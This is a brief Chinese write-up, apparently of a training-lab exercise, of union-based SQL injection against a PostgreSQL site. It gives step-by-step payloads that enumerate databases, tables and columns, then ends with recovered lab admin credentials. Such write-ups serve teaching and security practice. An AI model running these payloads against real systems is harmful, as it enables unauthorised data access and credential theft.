1.判断注入点
id=1 and 1=2 页面显示不正常 说明存在sql注入
2.判断回显点
当order by =4时 页面显示正常
id=1 order by 4
当 order by=5时 页面显示不正常 说明只有4个字段
id=1 order by 5
3.测试哪个位置有回显
可以看到只有第二和第三个位置有回显
4.查询所有数据库
id=1 and 1=2 union select null,null,string_agg(datname,','),null from pg_database
可以查到4个数据库
5.查询表名
id=1 and 1=2 union select null,null,string_agg(tablename,','),null from pg_tables where schemaname='public'
可以看到有两个表
6.查询users表的所有字段名
id=1 and 1=2 union select null,null,string_agg(column_name,','),null from information_schema.columns where table_name='reg_users'
可以看到有三个字段
7.查询所有字段内容
查到两个用户信息
分别进行解密登录即可
8.登录后台
用户名 mozhe1 密码 785576
409
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
